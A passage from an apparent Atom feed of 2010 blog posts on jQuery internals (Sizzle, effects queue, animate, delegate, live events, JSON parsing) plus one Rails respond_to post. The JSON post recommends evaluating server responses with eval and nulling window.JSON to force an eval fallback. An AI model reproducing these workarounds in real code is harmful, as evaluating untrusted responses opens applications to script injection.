/:(only|nth|last|first)-child(?:\((even|odd|[\dn+-]*)\))?/,     POS: /:(nth|eq|gt|lt|first|last|even|odd)(?:\((\d*)\))?(?=[^-]|$)/,     PSEUDO: /:((?:[\w\u00c0-\uFFFF-]|\\.)+)(?:\((['&quot;]?)((?:\([^\)]+\)|[^\(\)]*)+)\2\))?/},</code></pre><p>One by one Sizzle will go through all the match definitions. In this case since<code>a</code> is a valid tag, a match will be found for <code>TAG</code>. Next following functionwill be called.</p><pre><code class="language-plaintext">TAG: function(match, context){     return context.getElementsByTagName(match[1]);}</code></pre><p>Now result consists of all <code>a</code> elements.</p><p>Next task is to find if each of these elements has a parent element matching<code>.header</code>. In order to test that a call will be made to method <code>dirCheck</code>. Inshort this is what the call looks like.</p><pre><code class="language-javascript">dir = 'parentNode';cur = &quot;.header&quot;checkSet = [ a www.neeraj.name, a www.google.com ] // object representationdirCheck( dir, cur, doneName, checkSet, nodeCheck, isXML )</code></pre><p>dirCheck method returns whether each element of checkSet passed the test. Afterthat a call is made to method <code>preFilter</code>. In this method the key code is below</p><pre><code class="language-javascript">if ( not ^ (elem.className &amp;&amp; (&quot; &quot; + elem.className + &quot; &quot;).replace(/[\t\n]/g, &quot; &quot;).indexOf(match) &gt;= 0) )</code></pre><p>For our example this is what is being checked</p><pre><code class="language-javascript">&quot; header &quot;.indexOf(&quot; header &quot;);</code></pre><p>This operation is repeated for all the elements on the checkSet. Elements notmatching the criteria are rejected.</p><h2>More methods in Sizzle</h2><p>if you dig more into Sizzle code you would see functions defined as <code>+</code>, <code>&gt;</code> and<code>~</code> . Also you will see methods like</p><pre><code class="language-plaintext">enabled: function(elem) {          return elem.disabled === false &amp;&amp; elem.type !== &quot;hidden&quot;;    },disabled: function(elem) {          return elem.disabled === true;     },checked: function(elem) {          return elem.checked === true;     },selected: function(elem) {          elem.parentNode.selectedIndex;          return elem.selected === true;     },parent: function(elem) {          return !!elem.firstChild;     },empty: function(elem) {          return !elem.firstChild;     },has: function(elem, i, match) {          return !!Sizzle( match[3], elem ).length;     },header: function(elem) {          return /h\d/i.test( elem.nodeName );     },text: function(elem) {          return &quot;text&quot; === elem.type;     },radio: function(elem) {          return &quot;radio&quot; === elem.type;     },checkbox: function(elem) {          return &quot;checkbox&quot; === elem.type;     },file: function(elem) {          return &quot;file&quot; === elem.type;     },password: function(elem) {          return &quot;password&quot; === elem.type;     },submit: function(elem) {          return &quot;submit&quot; === elem.type;     },image: function(elem) {          return &quot;image&quot; === elem.type;     },reset: function(elem) {          return &quot;reset&quot; === elem.type;     },button: function(elem) {          return &quot;button&quot; === elem.type || elem.nodeName.toLowerCase() === &quot;button&quot;;     },input: function(elem) {          return /input|select|textarea|button/i.test(elem.nodeName);     }},first: function(elem, i) {          return i === 0;     },last: function(elem, i, match, array) {          return i === array.length - 1;     },even: function(elem, i) {          return i % 2 === 0;     },odd: function(elem, i) {          return i % 2 === 1;     },lt: function(elem, i, match) {          return i &lt; match[3] - 0;     },gt: function(elem, i, match) {          return i &gt; match[3] - 0;     },nth: function(elem, i, match) {          return match[3] - 0 === i;     },eq: function(elem, i, match) {          return match[3] - 0 === i;     }</code></pre><p>I use all these methods almost daily and it was good to see how these methodsare actually implemented.</p><h2>Performance Implications</h2><p>Now that I have little more understanding of how Sizzle works, I can betteroptimize my selector queries. Here are two selectors doing the same thing.</p><pre><code class="language-javascript">$(&quot;p.about_me .employment&quot;);$(&quot;.about_me  p.employment&quot;);</code></pre><p>Since Sizzle goes from right to left, in the first case Sizzle will pick up allthe elements with the class <code>employment</code> and then Sizzle will try to filter thatlist. In the second case Sizzle will pick up only the <code>p</code> elements with class<code>employment</code> and then it will filter the list. In the second case the right mostselection criteria is more specific and it will bring better performance.</p><p>So the rule with Sizzle is to go more specific on right hand side and to go lessspecific on left hand side. Here is another example.</p><pre><code class="language-javascript">$(&quot;.container :disabled&quot;);$(&quot;.container input:disabled&quot;);</code></pre><p>The second query will perform better because the right side query is morespecific.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Understanding jQuery effects queue]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/understanding-jquery-effects-queue"/>
      <updated>2010-02-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/understanding-jquery-effects-queue</id>
      <content type="html"><![CDATA[<p>Recently I tried following code in jQuery and it did not work.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }).hide();</code></pre><p>If I pass a parameter to <code>hide</code> then it would start working.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }).hide(1);</code></pre><p>As it turns out I did not have proper understanding of how effects work injQuery.</p><p>animate method uses a queue inside. This is the queue to which all the pendingactivities are added.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }).animate({ width: &quot;200px&quot; });</code></pre><p>In the above code element is being animated twice. However the second animationwill not start until the first animation is done. While the first animation ishappening the second animation is added to a queue. Name of this default queueis <code>fx</code>. This is the queue to which jQuery adds all the pending activities whileone activity is in progress. You can inquire an element about how many pendingactivities are there in the queue.</p><pre><code class="language-javascript">$(&quot;#lab&quot;)  .animate({ height: &quot;200px&quot; })  .animate({ width: &quot;200px&quot; })  .animate({ width: &quot;800px&quot; })  .queue(function () {    console.log($(this).queue(&quot;fx&quot;).length);    $(this).dequeue();  })  .animate({ width: &quot;800px&quot; })  .queue(function () {    console.log($(this).queue(&quot;fx&quot;).length);    $(this).dequeue();  });</code></pre><p>In the above code, twice the current queue is being asked to list number ofpending activities. First time the number of pending activities is 3 and thesecond time it is 1.</p><p>Method show and hide also accepts duration. If a duration is passed then thatoperation is added to the queue. If duration is not passed or if the duration iszero then that operation is not added to queue.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).hide(); // this action is not added to fx queue$(&quot;#lab&quot;).hide(0); // this action is not added to fx queue$(&quot;#lab&quot;).hide(1); // this action is added to fx queue</code></pre><h2>Coming back to the original question</h2><p>When show or hide method is invoked without any duration then those actions arenot added to queue.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }).hide();</code></pre><p>In the above code since hide method is not added to queue, both the animate andthe hide method are executed simultaneously. Hence the end result is thatelement is not hidden.</p><p>It could be fixed in a number of ways. One way would be to pass a duration tohide method.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }).hide(1);</code></pre><p>Another way to fix it would be to pass hiding action as a callback function toanimate method.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }, function () {  $(this).hide();});</code></pre><p>Another way would be to explicitly put hide method in a queue.</p><pre><code class="language-javascript">$(&quot;#lab&quot;)  .animate({ height: &quot;200px&quot; })  .queue(function () {    $(this).hide();  });</code></pre><p>Since hide method is not added to queue by default, in this case I haveexplicitly put the hide method to the queue.</p><p>Note that inside a queue method you must explicitly call <code>dequeue</code> for the nextactivity from the queue to be picked up.</p><pre><code class="language-javascript">$(&quot;#lab&quot;)  .animate({ height: &quot;200px&quot; })  .queue(function () {    $(this).hide().dequeue();  })  .animate({ width: &quot;200px&quot; });</code></pre><p>In the above code if <code>dequeue</code> is not called then second animation will nevertake place.</p><p>Also note that methods like fadeTo, fadeIn, fadeOut, slideDown, slideUp andanimate are ,by default, added to default queue.</p><h2>Turning off all animations</h2><p>If for some reason you don't want animation then just set <code>$.fx.off = true</code>.</p><pre><code class="language-javascript">$.fx.off = true;$(&quot;#lab&quot;).animate({ height: &quot;200px&quot; }, function () {  $(this).hide();});</code></pre><p>Above code is telling jQuery to turn off all animations and that would result inthe element hiding in an instant.</p>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery edge delegate method has arrived]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-edge-delegate-method-has-arrived"/>
      <updated>2010-02-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-edge-delegate-method-has-arrived</id>
      <content type="html"><![CDATA[<p>One of the issues with live method is that live method first searches throughall the elements then throws away the result.</p><pre><code class="language-javascript">$('p').live('click', function({})</code></pre><p>In the above case jQuery does nothing with the selected <code>p</code> elements. Since theresult does not really matter, it is a good idea to remove such codes from the<code>document ready</code> callbacks list.</p><p>So instead of doing this</p><pre><code class="language-javascript">$(function(){  $('p').live('click', function({})})</code></pre><p>just do this</p><pre><code class="language-javascript">$('p').live('click', function({})</code></pre><h2>Going a step further</h2><p>John just landed<a href="http://github.com/jquery/jquery/commit/31432e048f879b93ffa44c39d6f5989ab2620bd8#comments">this commit which adds delegate</a>method .</p><p>Html markup</p><pre><code class="language-html">&lt;div id=&quot;lab&quot;&gt;  &lt;p&gt;p inside lab&lt;/p&gt;&lt;/div&gt;&lt;p&gt;p outside lab&lt;/p&gt;</code></pre><p>If you want to track all the clicks on p then you could write like this.</p><pre><code class="language-javascript">$(document).delegate(&quot;p&quot;, &quot;click&quot;, function () {  log(&quot;p was clicked&quot;);});</code></pre><p>However if you only want to track clicks on 'p' which are inside the id <code>lab</code>then you can write like this.</p><pre><code class="language-javascript">$(&quot;#lab&quot;).delegate(&quot;p&quot;, &quot;click&quot;, function () {  log(&quot;p was clicked&quot;);});</code></pre><p>Note this functionality is in jQuery edge and is not available in jQuery 1.4.1.So you will have to get jQuery code from github to play with it.</p><p>If you are interested in the jQuery.live vs jQuery.fn.live discussion thenfollow<a href="http://forum.jquery.com/topic/jquery-live-jquery-fn-live-discussion">this thread</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery show method edge case]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-show-method-edge-case"/>
      <updated>2010-01-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-show-method-edge-case</id>
      <content type="html"><![CDATA[<p>Here is a simple case of invoking <code>show</code> method on a hidden element.</p><pre><code class="language-html">&lt;style&gt;  p {    display: inline;  }  #hello p {    display: none;  }&lt;/style&gt;&lt;div id=&quot;container&quot;&gt;  &lt;div id=&quot;hello&quot;&gt;    Hello World    &lt;p&gt;this is p inside hello&lt;/p&gt;  &lt;/div&gt;&lt;/div&gt;</code></pre><p>jQuery code.</p><pre><code class="language-javascript">$(&quot;p&quot;).show();</code></pre><p>You can see the result <a href="http://jsfiddle.net/d5uW7">here</a> . Notice that when <code>p</code>is shown then <code>display</code> property of <code>p</code> is <code>inline</code> which is what it should be.All is well.</p><p>Now I'll change the css a little bit and will try the same code again. New cssis .</p><pre><code class="language-html">&lt;style&gt;  #container p {    display: inline;  }  #hello p {    display: none;  }&lt;/style&gt;</code></pre><p>See the result <a href="http://jsfiddle.net/qj6PT">here</a> . Notice that <code>display</code>property of <code>p</code> is <code>block</code> instead of <code>inline</code> .</p><h2>Where did jQuery go wrong?</h2><p>jQuery did not do anything wrong. It is just being a bit lazy. I'll explain.</p><p>Since the element was hidden when jQuery was asked to display it, jQuery had noidea where the element should have display property <code>inline</code> or <code>block</code>. SojQuery attempts to find out the display property of the element by askingbrowser what the display property should be.</p><p>jQuery first finds out the nodeName of the element. In this case value would be<code>P</code>. Then jQuery adds a <code>P</code> to body and then asks browser what is the displayproperty of this newly added element. Whatever is the return value jQueryapplies that value to the element that was asked to be shown.</p><p>In the first experiment, css style <code>p { display: inline; }</code>said that all pelements are inline. So when jQuery added a new p element to body and askedbrowser for the display property, browser replied 'inline' and 'inline' wasapplied to the element. All was good.</p><p>In the second case, I changed the stylesheet <code>#container p { display: inline; }</code>to have only p elements under id <code>hello</code> to have inline property. So when jQueryadded a p element to body and asked for display type, browser correctly repliedas 'block'.</p><p>So what's the fix.</p><p>Find the parent element (#hello) of the element in question ( p in this case) .jQuery should add a new p element to the #hello and then jQuery would get theright display property.</p>]]></content>
    </entry><entry>
       <title><![CDATA[jQuery fadeTo method fades even the hidden elements]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/jquery-fadeto-method-fades-even-the-hidden-elements"/>
      <updated>2010-01-29T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/jquery-fadeto-method-fades-even-the-hidden-elements</id>
      <content type="html"><![CDATA[<p><em>Following code has been tested with jQuery 1.4.1 . Code demo links are the endof the blog .</em></p><p><a href="http://api.jquery.com/fadeTo">fadeTo</a> method of jQuery ,strangely, fades eventthe hidden elements.</p><p>Here is html markup.</p><pre><code class="language-html">&lt;style&gt;  #hello p {    display: none;  }&lt;/style&gt;&lt;div id=&quot;hello&quot;&gt;  &lt;p&gt;this is p inside hello&lt;/p&gt;&lt;/div&gt;&lt;p&gt;This is p outside hello&lt;/p&gt;</code></pre><p>Since the first <code>p</code> is hidden, you will see only one <code>p</code> element in the browser.Now execute following jQuery code.</p><pre><code class="language-javascript">$('p').fadeTo('slow', 0.5');</code></pre><p>You will see both the <code>p</code> elements.</p><p>jQuery goes out of its way to make sure that hidden elements are visible. Hereis <code>fadeTo</code> method.</p><pre><code class="language-javascript">fadeTo: function( speed, to, callback ) {return this.filter(&quot;:hidden&quot;).css(&quot;opacity&quot;, 0).show().end().animate({opacity: to}, speed, callback);}</code></pre><p>Also notice that for a hidden element fadeTo operation starts with opacity ofzero, while other elements will go down towards zero.</p><p>Checkout the same demo in slow motion and notice that while the first p elementemerges out of hiding, the other p element is slowing fading. This might causeunwanted effect . So watch out for this one.</p><ul><li><a href="http://jsfiddle.net/DPWSQ">First Demo</a></li><li><a href="http://jsfiddle.net/6gaEQ">Second Demo</a></li><li><a href="http://jsfiddle.net/sLwx5">Third Demo</a></li></ul>]]></content>
    </entry><entry>
       <title><![CDATA[Order of format matters in respond_to block]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/order-of-format-matters-in-respond_to-block"/>
      <updated>2010-01-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/order-of-format-matters-in-respond_to-block</id>
      <content type="html"><![CDATA[<p>This is a standard Rails code. I am using Rails 2.3.5 .</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    @users = User.all    respond_to do |format|      format.html      format.js  { render :json =&gt; @users }    end  endend</code></pre><p>Accidentally in one of my controllers the order of formats got reversed. Thealtered code looks like this.</p><pre><code class="language-ruby">class UsersController &lt; ApplicationController  def index    @users = User.all    respond_to do |format|      format.js  { render :json =&gt; @users }      format.html    end  endend</code></pre><p>I thought order of format declaration does not matter. I was wrong.</p><pre><code class="language-plaintext">&gt; curl -I http://localhost:3000/usersHTTP/1.1 200 OKConnection: closeDate: Mon, 25 Jan 2010 22:32:16 GMTETag: &quot;d751713988987e9331980363e24189ce&quot;Content-Type: text/javascript; charset=utf-8X-Runtime: 62Content-Length: 2Cache-Control: private, max-age=0, must-revalidate</code></pre><p>Notice the Content-Type of in the response header is&lt;strong&gt;text/javascript&lt;/strong&gt; in stead of &lt;strong&gt;text/html&lt;/strong&gt; .</p><p>Well I guess the order of format matters. I hope it is fixed in Rails 3.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How animate really works in jQuery]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-animate-really-works-in-jquery-simple-animation-case-discussed"/>
      <updated>2010-01-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-animate-really-works-in-jquery-simple-animation-case-discussed</id>
      <content type="html"><![CDATA[<p>jQuery has <a href="http://api.jquery.com/animate">animate method</a> which is justawesome. Today I looked into jQuery source code to see exactly how animateworks.</p><p>I will take a simple case of animating a <code>div</code> from height of <code>34</code> to <code>100</code>.</p><p>Here is test case.</p><pre><code class="language-javascript">$(function () {  $(&quot;#lab&quot;).css({ background: &quot;yellow&quot;, height: &quot;34px&quot;, margin: &quot;10px&quot; });  $(&quot;a&quot;).click(function () {    $(&quot;#lab&quot;).animate({ height: &quot;100&quot; });    return false;  });});</code></pre><p>Html markup is .</p><pre><code class="language-html">&lt;a href=&quot;&quot;&gt;click me&lt;/a&gt;&lt;div id=&quot;lab&quot;&gt;Hello World&lt;/div&gt;</code></pre><p>Inside the <code>animate</code> for each property an fx object is created.</p><pre><code class="language-javascript">jQuery.each( prop, function( name, val ) {  var e = new jQuery.fx( self, opt, name );}</code></pre><p>Calling new on jQuery.fx returns a JavaScript object instance.</p><pre><code class="language-javascript">fx: function( elem, options, prop ) {this.options = options;this.elem = elem;this.prop = prop;if ( !options.orig ) {options.orig = {};}}</code></pre><p>Next in the animate method is a call to <code>e.custom</code> .</p><pre><code class="language-javascript">start = 34;end = 100;unit = &quot;px&quot;;e.custom(start, end, unit);</code></pre><p>start, end and unit values are gleaned from the current state of div.</p><p>Here is custom method .</p><pre><code class="language-javascript">custom: function( from, to, unit ) {this.startTime = now();this.start = from;this.end = to;this.unit = unit || this.unit || &quot;px&quot;;this.now = this.start;this.pos = this.state = 0;var self = this;function t( gotoEnd ) {return self.step(gotoEnd);}t.elem = this.elem;if ( t() &amp;&amp; jQuery.timers.push(t) &amp;&amp; !timerId ) {timerId = setInterval(jQuery.fx.tick, 13);}},</code></pre><p>As you can see every 13 milliseconds a call to <code>step</code> method is made.</p><p><code>step</code> method is where real calculation is done. Here is the code.</p><pre><code class="language-javascript">step: function( gotoEnd ) {  var t = now();  var n = t - this.startTime;  this.state = n / this.options.duration;  pos = jQuery.easing['swing'](this.state, n, 0, 1, this.options.duration);  this.now = this.start + ((this.end - this.start) * this.pos);  this.update();}</code></pre><p><code>this.startTime</code> is the time when the call to <code>animate</code> was invoked. The <code>step</code>method is called periodically from custom method. So the value of <code>t</code> isconstantly changing. Based on the value of <code>t</code>, value of <code>n</code> will change. Someof the values of <code>n</code> I got was 1, 39, 69, 376 and 387.</p><p>While invoking animate method I did not specify a speed. jQuery picked up thedefault speed of 400. In this case the value of this.options.duration is <code>400</code>.The value of state would change in each run and it would something along theline of 0.0025, 0.09, 0.265, 0.915 and 0.945 .</p><p>If you don't know what easing is then you should read<a href="http://www.learningjquery.com/2009/02/quick-tip-add-easing-to-your-animations">this article</a>by Brandon Aaron. Since I did not specify easing option, jQuery will pickup<code>swing</code> easing .</p><p>In order to get the value of next position this easing algorithm needs state, nand duration. When all of it was supplied then <code>pos</code> would be derived. The valueof <code>pos</code> over the period of animation would change and it would be somethinglike 0, 0.019853157161528467, 0.04927244144387716, 0.9730426794137726,0.9973960708808632.</p><p>Based on the value of <code>pos</code> value of <code>now</code> is derived. And then <code>update</code> methodis called to update the screen.</p><p><code>update</code> method has following code that invokes <code>_default</code> method.</p><pre><code class="language-javascript">jQuery.fx.step._default)( this )</code></pre><p><code>_default</code> method has following code which finally updates the element.</p><pre><code class="language-javascript">fx.elem.style[fx.prop] = Math.max(0, fx.now);</code></pre><p>fx.now value was set in the custom method and here that value was actuallyapplied to the element.</p><p>You will have much better understanding of how animate works if you look at thesource code. I just wanted to know at a high level what's going on and these aremy findings.</p>]]></content>
    </entry><entry>
       <title><![CDATA[JSON parsing natively in jQuery 1.4 and updates]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/handling-json-parsing-natively-in-jquery-1-4-and-what-changed-from-jquery-1-3"/>
      <updated>2010-01-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/handling-json-parsing-natively-in-jquery-1-4-and-what-changed-from-jquery-1-3</id>
      <content type="html"><![CDATA[<p>With the popularity of JavaScript JSON has become very very popular.<a href="http://www.json.org">JSON</a> which stands for <code>JavaScript Object Notation</code> is apopular way to send and receive data between browser and server.</p><p>jQuery makes it extremely easy to deal with JSON data. In the below exampleserver sends a success message to browser. The JSON data looks like this.</p><pre><code class="language-text">{ 'success': 'record was successfully updated' }</code></pre><p>The jQuery code to handle JSON data looks like this.</p><pre><code class="language-javascript">$.ajax({  type: &quot;GET&quot;,  url: &quot;test.js&quot;,  dataType: &quot;json&quot;,  success: function (json) {    $(&quot;#result&quot;).text(json.success);  },});</code></pre><p>It all looks good and the code works with jQuery 1.3 .</p><p>However if you upgrade to jQuery 1.4 then above code will stop working. Why?jQuery 1.4 does strict JSON parsing using native parse method and any malformedJSON structure will be rejected.</p><h2>How jQuery 1.3 parses JSON structure</h2><p>jQuery 1.3 uses JavaScripts eval to evaluate incoming JSON structure. Openfirebug and type following example.</p><pre><code class="language-javascript">s = &quot; { 'success' :  'record was updated' } &quot;;result = eval(&quot;(&quot; + s + &quot;)&quot;);console.log(result);</code></pre><p>You will get a valid output.</p><p>Note that all valid JSON structure is also valid JavaScript code so evalconverts a valid JSON structure into a JavaScript object. However non JSONstructure can also be converted into JavaScript object.</p><p>JSON specification says that all string values must use double quotes. Singlequotes are not allowed. What it means is that following JSON structures are notvalid JSON.</p><pre><code class="language-text">{ 'foo' : 'bar' }{ foo: 'bar' }{ foo: &quot;bar&quot; }{ &quot;foo&quot; : 'bar' }</code></pre><p>Even though above strings are not valid JSON if you eval them they will producea valid JavaScript object. Since jQuery 1.3 uses eval on strings to convert JSONstructure to JavaScript object all the above mentioned examples work.</p><p>However they will not work if you upgrade to jQuery 1.4 .</p><h2>jQuery 1.4 uses native JSON parsing</h2><p>Using eval to convert JSON into JavaScript object has a few issue. First is thesecurity. It is possible that eval could execute some malicious code. Secondlyit is not as fast as native parse methods made available by browsers. Howeverbrowsers adhere to JSON spec and they will not parse malformed JSON structures.Open firebug and try following code to see how native browser methods do notparse malformed JSON structure. Here is the link to the announcement of<a href="http://blog.mozilla.com/webdev/2009/02/12/native-json-in-firefox-31">Firefox support for native JSON parsing</a>. John Resig mentioned the need for jQuery to have native JSON parsing support<a href="http://ejohn.org/blog/native-json-support-is-required/#postcomment">here</a> .</p><pre><code class="language-javascript">s = &quot; { 'success' :  'record was updated' } &quot;;result = eval(&quot;(&quot; + s + &quot;)&quot;);console.log(result); /* returns valid JavaScript object */result2 = window.JSON.parse(s);console.log(result2); /* throws error */</code></pre><p>As you can see a string which was successfully parsed by <code>eval</code> failed by<code>window.JSON.parse</code> . It might or might not fail in chrome. More on that later.Since jQuery 1.4 will rely on browsers parsing the JSON structure malformed JSONstructures will fail.</p><p>In order to ensure that JSON is correctly parsed by the browsers, jQuery doessome code cleanup to make sure that you are not trying to pass somethingmalicious. You will not be able to test this thing directly using firebug but ifyou make an AJAX request and from server if you send response then you canverify the following code.</p><p>Following JSON structure will be correctly parsed in jQuery 1.3 . However thesame JSON structure will fail in jQuery 1.4 . Why? Because of dangling openbracket <code>[</code> .</p><pre><code class="language-javascript">' { &quot;error&quot; : &quot;record was updated&quot; }';</code></pre><p>jQuery 1.4 has following code that does some data cleanup to get around thesecurity issue with JSON parsing before sending that data to browser forparsing. Here is a snippet of the code.</p><pre><code class="language-javascript">// Make sure the incoming data is actual JSON// Logic borrowed from http://json.org/json2.jsif (/^[\],:{}\s]*$/.test(data.replace(/\\(?:[&quot;\\\/bfnrt]|u[0-9a-fA-F]{4})/g, &quot;@&quot;).replace(/&quot;[^&quot;\\\n\r]*&quot;|true|false|null|-?\d+(?:\.\d*)?(?:[eE][+\-]?\d+)?/g, &quot;]&quot;).replace(/(?:^|:|,)(?:\s*\[)+/g, &quot;&quot;)))</code></pre><p>Not all browsers parse JSON same way</p><p>Earlier I mentioned that following JSON structure will not be correctly parsedby browsers.</p><pre><code class="language-text"> { 'a':1 } </code></pre><p>All browsers will fail to parse above JSON structure except <code>chrome</code> . Look atthis blog titled <a href="http://dbj.org/dbj/?p=470">Cross Browser JSON parsing</a> to getmore insight into this issue.</p><h2>I have malformed JSON and I want to use jQuery 1.4</h2><p>If you have malformed JSON and you want to use jQuery 1.4 then you should sendthe datatype as <code>text</code> and then convert the returned JSON structure using eval.Here is one way you can do that.</p><pre><code class="language-javascript">$.ajax({  url: &quot;/url&quot;,  dataType: &quot;text&quot;,  success: function (data) {    json = eval(&quot;(&quot; + data + &quot;)&quot;);    // do something with json  },});</code></pre><p><a href="http://benalman.com">Ben Alman</a> suggested another way in the<a href="http://yehudakatz.com/2010/01/15/jquery-1-4-and-malformed-json">comment section</a>.</p><pre><code class="language-text">/* this should be the very first JavaScript inclusion file */&lt;script type=text/javascript language=javascript&gt;window.JSON = null;&lt;/script&gt;</code></pre><p>jQuery attempts to parse JSON natively. However if native JSON parsing is notavailable then it falls back to <code>eval</code>. Here by setting <code>window.JSON to null</code>browser is faking that it does not have support for native JSON parsing.</p><p>Here are the<a href="http://github.com/jquery/jquery/commit/90a87c03b4943d75c24bc5e6246630231d12d933">two</a><a href="http://github.com/jquery/jquery/commit/44e6beb10304789044de2c5a58f5bb82e8321636">commits</a>which made most of the changes in the way parsing is done.</p><p>Use <a href="http://www.jsonlint.com">JSONLint</a> if you want to play with various stringsto see which one is valid JSON and which one is not.</p>]]></content>
    </entry><entry>
       <title><![CDATA[How jQuery 1.4 fixed rest of live methods]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/how-jquery-1-4-fixed-rest-of-live-methods"/>
      <updated>2010-01-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-jquery-1-4-fixed-rest-of-live-methods</id>
      <content type="html"><![CDATA[<p>If you look at jQuery 1.3 documentation for <code>live</code> method you will notice thatthe live method is not supported for following events: blur, focus, mouseenter,mouseleave, change and submit .</p><p>jQuery 1.4 fixed them all.</p><p>In this article I am going to discuss how jQuery brought support for thesemethods in jQuery. If you want a little background on what is <code>live</code> method andhow it works then you should read<a href="how-live-method-works-in-jquery-why-it-does-not-work-in-some-cases-when-to-use-livequery">this article</a>which I wrote sometime back.</p><h3>focus and blur events</h3><p>IE and other browsers do not bubble <code>focus</code> and <code>blur</code> events. And that is incompliance with the w3c events model. As per the<a href="http://www.w3.org/TR/DOM-Level-2-Events/events.html#Events-eventgroupings-htmlevents-h3">spec</a>focus event and blur event do not bubble.</p><p>However the spec also mentions two additional events called <code>DOMFocusIn</code> and<code>DOMFocusOut</code>. As per the<a href="http://www.w3.org/TR/DOM-Level-2-Events/events.html#Events-Event-initUIEvent">spec</a>these two events should bubble. Firefox and other browsers implementedDOMFocusIn/DOMFocusOut . However IE implemented <code>focusin</code> and <code>focusout</code> and IEmade sure that these two events do bubble up.</p><p>jQuery team decided to pick shorter name and introduced two new events:<code>focusin</code> and <code>focusout</code>. These two events bubble and hence they can be usedwith live method.<a href="http://github.com/jquery/jquery/commit/03481a52c72e417b01cfeb499f26738cf5ed5839">This commit</a>makes focusin/focusout work with live method. Here is code snippet.</p><pre><code class="language-javascript">if (document.addEventListener) {  jQuery.each({ focus: &quot;focusin&quot;, blur: &quot;focusout&quot; }, function (orig, fix) {    jQuery.event.special[fix] = {      setup: function () {        this.addEventListener(orig, handler, true);      },      teardown: function () {        this.removeEventListener(orig, handler, true);      },    };    function handler(e) {      e = jQuery.event.fix(e);      e.type = fix;      return jQuery.event.handle.call(this, e);    }  });}</code></pre><p>Once again make sure that you are using <code>focusin/focusout</code> instead of<code>focus/blur</code> when used with <code>live</code> .</p><h2>mouseenter and mouseleave events</h2><p><code>mouseenter</code> and <code>mouseleave</code> events do not bubble in IE. However <code>mouseover</code>and <code>mouseout</code> do bubble in IE. If you are not sure of what the difference isbetween <code>mouseenter</code> and <code>mouseover</code> then<a href="http://www.bennadel.com/blog/1805-jQuery-Events-MouseOver-MouseOut-vs-MouseEnter-MouseLeave.htm">watch this excellent</a>screencast by Ben.</p><p>The fix that was applied to map for <code>focusin</code> can be replicated here to fix<code>mousetner</code> and <code>mouseleave</code> issue.<a href="http://github.com/jquery/jquery/commit/d251809912c06478fd0c7711736ef6ea3572723e">This is the commit</a>that fixed mouseenter and mouseleave issue with live method.</p><pre><code class="language-javascript">jQuery.each(  {    mouseenter: &quot;mouseover&quot;,    mouseleave: &quot;mouseout&quot;,  },  function (orig, fix) {    jQuery.event.special[orig] = {      setup: function (data) {        jQuery.event.add(          this,          fix,          data &amp;&amp; data.selector ? delegate : withinElement,          orig        );      },      teardown: function (data) {        jQuery.event.remove(          this,          fix,          data &amp;&amp; data.selector ? delegate : withinElement        );      },    };  });</code></pre><h2>Event detection</h2><p>Two more events are left to be handled: submit and change. Before jQuery appliesfix for these two events, jQuery needs a way to detect if a browser allowssubmit and change events to bubble or not. jQuery team does not favor browsersniffing. So how to go about detecting event support without browser sniffing.</p><p>Juriy Zaytsev posted an excellent blog titled<a href="http://perfectionkills.com/detecting-event-support-without-browser-sniffing">Detecting event support without browser sniffing</a>. Here is the short and concise way he proposes to find out if an event issupported by a browser.</p><pre><code class="language-javascript">var isEventSupported = (function () {  var TAGNAMES = {    select: &quot;input&quot;,    change: &quot;input&quot;,    submit: &quot;form&quot;,    reset: &quot;form&quot;,    error: &quot;img&quot;,    load: &quot;img&quot;,    abort: &quot;img&quot;,  };  function isEventSupported(eventName) {    var el = document.createElement(TAGNAMES[eventName] || &quot;div&quot;);    eventName = &quot;on&quot; + eventName;    var isSupported = eventName in el;    if (!isSupported) {      el.setAttribute(eventName, &quot;return;&quot;);      isSupported = typeof el[eventName] == &quot;function&quot;;    }    el = null;    return isSupported;  }  return isEventSupported;})();</code></pre><p>In the comments section John Resig mentioned that this technique can also beused to find out if an event bubbles or not.</p><p>John committed following code to jQuery.</p><pre><code class="language-javascript">var eventSupported = function (eventName) {  var el = document.createElement(&quot;div&quot;);  eventName = &quot;on&quot; + eventName;  var isSupported = eventName in el;  if (!isSupported) {    el.setAttribute(eventName, &quot;return;&quot;);    isSupported = typeof el[eventName] === &quot;function&quot;;  }  el = null;  return isSupported;};jQuery.support.submitBubbles = eventSupported(&quot;submit&quot;);jQuery.support.changeBubbles = eventSupported(&quot;change&quot;);</code></pre><p>Next task is to actually make a change event or a submit event bubble if ,basedon above code, it is determined that browse is not bubbling those events .</p><h2>Making change event 